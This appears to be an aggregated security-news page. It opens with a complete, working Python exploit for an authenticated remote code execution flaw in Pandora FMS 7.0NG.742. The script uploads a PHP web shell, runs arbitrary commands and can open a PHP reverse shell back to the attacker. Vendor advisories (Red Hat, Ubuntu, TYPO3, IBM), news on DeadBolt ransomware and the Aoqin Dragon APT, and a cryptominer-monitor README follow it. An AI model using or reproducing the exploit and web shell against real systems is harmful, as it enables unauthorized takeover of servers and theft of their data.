Pandora FMS version 7.0NG.742 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)# Date: 05/20/2022# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)# Vendor Homepage: https://pandorafms.com/# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz# Version: v7.0NG.742# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)# CVE: CVE-2020-5844# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.#!/usr/bin/env python3# Importstry:    import requestsexcept:    print(f"ERRORED: RUN: pip install requests")    exit()import sysimport timeimport urllib.parse# Class for colorsclass color:    red = '\033[91m'    gold = '\033[93m'    blue = '\033[36m'    green = '\033[92m'    no = '\033[0m'# Print UNICORD ASCII Artdef UNICORD_ASCII():    print(rf"""{color.red}        _ __,~~~{color.gold}/{color.red}_{color.no}        {color.blue}__  ___  _______________  ___  ___{color.no}{color.red}    ,~~`( )_( )-\|       {color.blue}/ / / / |/ /  _/ ___/ __ \/ _ \/ _ \{color.no}{color.red}        |/|  `--.       {color.blue}/ /_/ /    // // /__/ /_/ / , _/ // /{color.no}{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}    """)# Print exploit help menudef help():    print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code ExecutionUsage:  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]  python3 exploit-CVE-2020-5844.py -hOptions:  -t    Target host and port. Provide target IP address and port.  -u    Target username and password. Provide username and password to log in to Pandora FMS.  -p    Target valid PHP session ID. No username or password needed. (Optional)  -s    Reverse shell mode. Provide local IP address and port. (Optional)  -c    Custom command mode. Provide command to execute. (Optional)  -w    Web shell custom mode. Provide custom PHP file name. (Optional)  -h    Show this help menu.""")    exit()# Pretty loading wheeldef loading(spins):    def spinning_cursor():        while True:            for cursor in '|/-\\':                yield cursor    spinner = spinning_cursor()    for _ in range(spins):        sys.stdout.write(next(spinner))        sys.stdout.flush()        time.sleep(0.1)        sys.stdout.write('\b')# Run the exploitdef exploit(exploitMode, targetSess):    UNICORD_ASCII()    # Print initial variables    print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}")    print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}")    if targetSess is not None:        print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")    elif targetUser is not None:        print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}")        print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}")    if exploitMode == "command":        print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}")    if exploitMode == "web":        print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}")    if exploitMode == "shell":        print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}")        print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}")    print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}")    loading(15)    # If a PHPSESSID is not provided, grab one with valid username and password    if targetSess is None:        try:            getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"})            targetSess = getSession.cookies.get('PHPSESSID')            print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")            if "login_move" in getSession.text:                print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}")        except:            print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}")            exit()    # Set headers, parameters, and cookies for post request    headers = {    'Host': f'{targetIP}',    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874',    'Content-Length': '1289',    'Connection': 'close',    'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager',    'Upgrade-Insecure-Requests': '1',    'Sec-Fetch-Dest': 'document',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-User': '?1'    }    params = (        ('sec', 'gsetup'),        ('sec2', 'godmode/setup/file_manager')    )    cookies = {'PHPSESSID': targetSess}    # Basic PHP web shell with 'cmd' parameter    data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n'    # Try to upload the PHP web shell to the server    try:        response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False)    except:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}")        exit()    statusCode=response.status_code    if statusCode == 200:        print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}")    else:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}")        exit()    loading(15)    print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}")    loading(15)    # Print web shell location if in web shell mode    if exploitMode == "web":        print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}")        print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n")    # Run custom command on web shell if in command mode    if exploitMode == "command":        response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}')        print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n")        print(response.text)    # Run reverse shell command if in reverse shell mode    if exploitMode == "shell":        shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'"        try:            requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1)            print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n")        except:            print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n")    exit()if __name__ == "__main__":    args = ['-h','-t','-u','-p','-s','-c','-w']    modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'}    # Initialize starting variables    targetIP = None    targetPort = None    targetUser = None    targetPass = None    targetSess = None    command = None    localIP = None    localPort = None    webName = "unicord.php" # Default web shell file name    exploitMode = "web" # Default to web shell mode    # Print help if specified or if a target or authentication is not provided    if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):        help()    # Collect target IP and port from CLI    if args[1] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 1]:                raise            targetIP = sys.argv[sys.argv.index(args[1]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 2]:                raise            targetPort = sys.argv[sys.argv.index(args[1]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()    # Collect target username and password from  CLI    if args[2] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 1]:                raise            targetUser = sys.argv[sys.argv.index(args[2]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 2]:                raise            targetPass = sys.argv[sys.argv.index(args[2]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()    # Collect PHPSESSID from CLI, if specified    if args[3] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[3]) + 1]:                raise            targetSess = sys.argv[sys.argv.index(args[3]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}")            exit()    # Set reverse shell mode from CLI, if specified    if args[4] in sys.argv:        exploitMode = "shell"        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 1]:                raise            localIP = sys.argv[sys.argv.index(args[4]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 2]:                raise            localPort = sys.argv[sys.argv.index(args[4]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set custom command mode from CLI, if specified    elif args[5] in sys.argv:        exploitMode = "command"        try:            if sys.argv[sys.argv.index(args[5]) + 1] in args:                raise            command = sys.argv[sys.argv.index(args[5]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set web shell mode from CLI, if specified    elif args[6] in sys.argv:        exploitMode = "web"        try:            if sys.argv[sys.argv.index(args[6]) + 1] in args:                raise            if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]:                webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php"            else:                webName = sys.argv[sys.argv.index(args[6]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Run with default web shell mode if no mode is specified    else:        exploit(exploitMode,targetSess)

Pandora FMS 7.0NG.742 Remote Code Execution

Red Hat Security Advisory 2022-5002-01 - The Advanced Virtualization module provides the user-space component for running virtual machines that use KVM in environments managed by Red Hat products. Issues addressed include buffer overflow, integer overflow, and memory leak vulnerabilities.

Red Hat Security Advisory 2022-5002-01

Ubuntu Security Notice 5478-1 - Christian Moch and Michael Gruhn discovered that the libblkid library of util-linux did not properly manage memory under certain circumstances. A local attacker could possibly use this issue to cause denial of service by consuming all memory through a specially crafted MSDOS partition table.

    ==========================================================================Ubuntu Security Notice USN-5478-1June 14, 2022util-linux vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:A util-linux program could be made to crash if it opened a speciallycrafted file system.Software Description:- util-linux: miscellaneous system utilitiesDetails:Christian Moch and Michael Gruhn discovered that the libblkid libraryof util-linux did not properly manage memory under certaincircumstances. A local attacker could possibly use this issue to causedenial of service by consuming all memory througha specially crafted MSDOS partition table.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:libblkid1 2.27.1-6ubuntu3.10+esm2util-linux 2.27.1-6ubuntu3.10+esm2In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-5478-1CVE-2016-5011

Ubuntu Security Notice USN-5478-1

The extension fails to properly encode user input for output in HTML context. A TYPO3 backend user account is required to exploit the vulnerability.

**Cross-Site Scripting**

Moderate severity GitHub Reviewed Published Jun 17, 2022 • Updated Jun 17, 2022

GHSA-374w-gwqr-fmxg: Cross-Site Scripting

> ### Meta
> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.9)

### Problem
User submitted content was used without being properly encoded in HTML emails sent to users. The actually affected components were mail clients used to view those messages.

### Solution
Update to TYPO3 versions 9.5.35 ELTS, 10.4.29, 11.5.11 that fix the problem described above.

### Credits
Thanks to Christian Seifert who reported this issue and to TYPO3 framework merger Andreas Fernandez who fixed the issue.

### References
* [TYPO3-CORE-SA-2022-004](https://typo3.org/security/advisory/typo3-core-sa-2022-004)

**Package**

**Affected versions**

\>= 10.0.0, < 10.4.29

\>= 11.0.0, < 11.5.11

**Patched versions**

10.4.29

11.5.11

\>= 9.0.0, < 9.5.35

\>= 10.0.0, < 10.4.29

\>= 11.0.0, < 11.5.11

GHSA-h4mx-xv96-2jgm: Cross-Site Scripting in Frontend Login Mailer

The QNAP network-connected devices, used to store video surveillance footage, are a juicy target for attackers, experts warn.

QNAP network-attached storage (NAS) devices running out-of-date software are under snowballing numbers of active attacks in a new DeadBolt ransomware campaign, an advisory has warned.

The company is investigating the situation, but meanwhile, QNAP recommends updating its QTS and QuTS hero to the latest versions as soon as possible. This is the second spate of attacks in the past few weeks.

QNAP NAS devices are used to store video surveillance footage and the data. In the hands of ransomware threat actors, the data could be used to extort any number of organizations and individuals, experts warned.

"Ransomware is starting to shift towards data theft, as the cybercriminals can gain from both being paid the ransom as well as sale of the data," Bud Broomhead, CEO of Viakoo, told Dark Reading in reaction to the campaign. "Threats against NAS devices will increase along with the shift to extending ransomware into data theft."

**Why NAS Devices Are Easy Targets**

Besides the potential data bonanza stored inside, Broomhead added that NAS devices are soft targets for cybercriminals because they're often not set up properly or protected by a firewall. They're also often not managed by IT teams, meaning there isn't a robust security patching or monitoring strategy in place to protect them from attack, he said.

"QNAP (and NAS drives in general) have been part of CISA's Known Exploited Vulnerability Catalog for some time," Broomhead added. "Out of 778 currently exploited vulnerabilities, 10 are specific to QNAP."

The company is offering support for customers who have already been compromised.

"If your NAS has already been compromised, take the screenshot of the ransom note to keep the bitcoin address, then, upgrade to the latest firmware version and the built-in Malware Remover application will automatically quarantine the ransom note which hijacks the login page," QNAP wrote in its security advisory on DeadBolt ransomware.

DeadBolt Ransomware Actively Targets QNAP NAS Devices — Again

IBM Robotic Process Automation 20.10.0, 20.12.5, 21.0.0, 21.0.1, and 21.0.2 contains a vulnerability that could allow a user to obtain sensitive information due to information properly masked in the control center UI. IBM X-Force ID: 227294.

  

**Summary**

IBM Robotic Process Automation is vulnerable to cross tenant disclosure of user ids (CVE-2022-30607)

**Vulnerability Details**

**CVEID:**   CVE-2022-30607  
**DESCRIPTION:**   IBM Robotic Process Automation contains a vulnerability that could allow a user to obtain sensitive information due to information properly masked in the control center UI.  
CVSS Base score: 2.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/227294 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation

21.0.2

IBM Robotic Process Automation for Cloud Pak

21.0.2

  

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s)**

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

< 21.0.2.3

Download and apply 21.0.2 IF003 or higher.

IBM Robotic Process Automation for Cloud Pak

< 21.0.2.3

Apply 21.0.2 IF003 or higher.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

30 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"20.10.0,20.12.5,21.0.0, 21.0.1, 21.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-30607: IBM Robotic Process Automation is vulnerable to cross tenant disclosure of user ids (CVE-2022-30607)

A vulnerability in Antminer Monitor 0.50.0 exists because of backdoor or misconfiguration inside a settings file in flask server. Settings file has a predefined secret string, which would be randomly generated, however it is static.

**Antminer Monitor **

Lite Python based Antminer Monitor !!!

*   Add as many miners as you want
*   Supports miners A3, B3, D3, E3, L3, L3+, L3++, R4, S7, S9, S11, S17, S17 Pro, S17+, T9, T9+, T17, V9, X3, Z9 mini, Z11
*   Check their hashrate, temperatures, fan speed, chip condition, HW Error Rate, Uptime
*   Get in-app notifications about miner errors (needs refresh)
*   Log errors to file
*   Display total hashrate grouped by Model
*   Password protected login page

**Screenshot**

**Requirements**

*   Antminer Monitor requires Python 3
*   Mac and Linux users have Python installed by default on their system
*   Windows users can download Python from https://www.python.org ** ATTENTION ** While installing Python be sure to check Add python.exe to Path in the step Customize Python If you don't select this option you will probably face some errors while installing the requirements

**Fresh Installation**

1.  Download the latest official release of #AntminerMonitor from https://github.com/anselal/antminer-monitor/releases or the latest unofficial release from https://github.com/anselal/antminer-monitor/archive/master.zip
    
2.  Unzip the downloaded file in a folder of your preference
    
3.  Open a windows command prompt or a terminal and navigate to the folder where you unzipped the file using the cd command
    
    e.g. If you unzipped the file in the folder C:\Users\foo\Downloads\antminer-monitor-master type the following command and press <Enter>
    
    cd C:\\Users\\foo\\Downloads\\antminer-monitor-master
    
    > Your command prompt or terminal should now look like C:\Users\foo\Downloads\antminer-monitor-master>
    
4.  **This step apply only to _Mac_ users**. If you are a Windows or Linux user continue to step 5.
    
    > Mac users should run all the commands with sudo eg. sudo python get_pip.py
    
    Install pip using ****one**** of the following methods:
    
    4.1 Download get-pip.py from https://bootstrap.pypa.io/get-pip.py and save it inside antminer-monitor-master. Run the following command to install it:
    
    > It will ask for the administrator password. Type it and press <Enter>. While typing your password you won't see the characters on your screen. This is only for security measures.
    
    4.2 Install pip using easy_install. Again it may ask for the administrator password.
    
5.  Install requirements (Mac users don't forget sudo)
    

python -m pip install -r requirements.txt
python manage.py create-db

**Login Page**

1.  Create admin user

python manage.py create-admin

Default creadentials are username: admin - password: antminermonitor. You can change the password from the settings menu.

**Run the app**

(Mac users don't forget sudo)

python manage.py run -h 0.0.0.0 -p 5000

Fire up a browser and point it to http://localhost:5000 if you are running the app on the same machine OR http://<ip>:5000 if you are accesing the app from another machine on the same network, by replacing <ip> with the machine's ip running AntminerMonitor.

Feel free to change the host (-h) and port (-p) parameters as needed by your setup.

You can set the host (-h) and port (-p) parameters in your .flaskenv file to avoid typing them when starting the app.

**Development vs. Production mode**

AntminerMonitor runs by default in development mode, using Flask's development server. In development mode, this server provides an interactive debugger and will reload when code is changed.

To switch to production mode, edit .flaskenv and set FLASK_ENV="production"

**Run AntminerMonitor as a service (systemd)**

Edit antminermonitor.service and adjust it properly to your environment

As root, run the following:

# Copy file service file to systemd's system folder
cp antminermonitor.service /etc/systemd/system/
# reload the daemon to apply changes
systemctl daemon-reload
# That’s it. We can now start the service:
systemctl start antminermonitor
# And automatically get it to start on boot
systemctl enable antminermonitor

**Donations**

*   BTC: 1HYCBovF6mqqKMyG4m2DQxXpdKmogK4Wuw
*   LTC: LLrjq6nRokS74yPMspitHkXv4nLtEyebNW
*   DASH: XuEnZtsCmWcDwKVe82wQddsfwUifXyeRoQ
*   ETH: 0x5bD8813Da5148fbc841bB18b9411fF72EdC8e10a

**Referral**

*   Get a Ledger Nano S and protect your cryptocurrencies

*   Listen to your favorite radio stations and earn BRO cryptocurrency !!!

*   Get paid to search

CVE-2021-40903: GitHub - anselal/antminer-monitor: Cryptocurrency ASIC mining hardware monitor using a simple web interface

Evidence suggests that a just-discovered APT has been active since 2013.

Evidence suggests that a just-discovered APT has been active since 2013.

Researchers have identified a small yet potent China-linked APT that has flown under the radar for nearly a decade running campaigns against government, education and telecommunication organizations in Southeast Asia and Australia.

Researchers from SentinelLabs said the APT, which they dubbed Aoqin Dragon, has been operating since at least 2013. The APT is “a small Chinese-speaking team with potential association to \[an APT called\] UNC94,” they reported.

Researchers say one of the tactics and techniques of Aoqin Dragon include using pornographic themed malicious documents as bait to entice victims to download them.

“Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices,” researchers wrote.

****Aoqin Dragon’s Evolving Stealth Tactics****

Part of what’s helped Aoqin Dragon stay under the radar for so long is that they’ve evolved. For example, the means the APT used to infect target computers has evolved.

In their first few years of operation, Aoqin Dragon relied on exploiting old vulnerabilities – specifically, CVE-2012-0158 and CVE-2010-3333 – which their targets might not have yet patched.

Later, Aoqin Dragon created executable files with desktop icons that made them appear to look like Windows folders or antivirus software. These programs were actually malicious droppers which planted backdoors and then established connections back to the attackers’ command-and-control (C2) servers.

Since 2018, the group has been utilizing a fake removable device as their infection vector. When a user clicks to open what seems to be a removable device folder, they in fact initiate a chain reaction which downloads a backdoor and C2 connection to their machine. Not only that, the malware copies itself to any actual removable devices connected to the host machine, in order to continue its spread beyond the host and, hopefully, into the target’s broader network.

The group has employed other techniques to stay off-the-radar. They’ve used DNS tunneling – manipulating the internet’s domain name system to sneak data past firewalls. One backdoor leverage – known as Mongall – encrypts communication data between host and C2 server. Over time, the researchers said, the APT began slowly working the fake removable disc technique. This was done to ” pgraded the malware to protect it from being detected and removed by security products.”

****Nation-State Links****

Targets have tended to fall in just a few buckets – government, education and telecoms, all in and around Southeast Asia. Researchers assert “the targeting of Aoqin Dragon closely aligns with the Chinese government’s political interests.”

Further evidence of China influence includes a debug log found by researchers that contains simplified Chinese characters.

Most important of all, the researchers highlighted an overlapping attack on the president of Myanmar’s website back in 2014. In that case, police traced the hackers’ command-and-control and mail servers to Beijing. Aoqin Dragon’s two primary backdoors “have overlapping C2 infrastructure,” with that case, “and most of the C2 servers can be attributed to Chinese-speaking users.”

Still, “properly identifying and tracking State and State Sponsored threat actors can be challenging,” Mike Parkin, senior technical engineer at Vulcan Cyber, wrote in a statement. “SentinelOne releasing the information now on an APT group that has apparently been active for almost a decade, and doesn’t appear in other lists, shows how hard it can be ‘to be sure’ when you’re identifying a new threat actor.”

Tag

#perl